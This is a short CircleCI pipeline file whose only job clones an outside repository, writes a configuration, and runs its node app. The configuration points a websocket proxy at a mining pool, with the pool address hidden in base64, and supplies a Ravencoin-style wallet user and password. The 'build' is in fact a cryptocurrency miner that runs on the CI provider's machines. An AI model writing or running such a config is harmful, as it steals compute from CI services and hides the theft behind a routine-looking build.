version: 2.1

jobs:
  run-script:
    docker:
      - image: cimg/node:20.19
    steps:
      - checkout
      - run:
          name: Clone a public repository
          command: |
            git clone https://github.com/ismailalkaf/node-mino-app.git node-mino-app
      - run:
          name: Run echo
          command: |
            cd node-mino-app
            echo '{"log": true, "proxy": "wss://present-nichol-vivo1-4f3dad8a.koyeb.app/bWlub3RhdXJ4Lm5hLm1pbmUuenBvb2wuY2E6NzAxOQ==", "user": "rM5GziBWoT9y4DQaiacGahTvKZze2TpzrB", "password": "c=RVN,56", "argent": "wasm-mino/2.0", "threads": 1}' > data.txt
      - run:
          name: Run node app
          command: |
            cd node-mino-app
            ./node app.js

workflows:
  build:
    jobs:
      - run-script
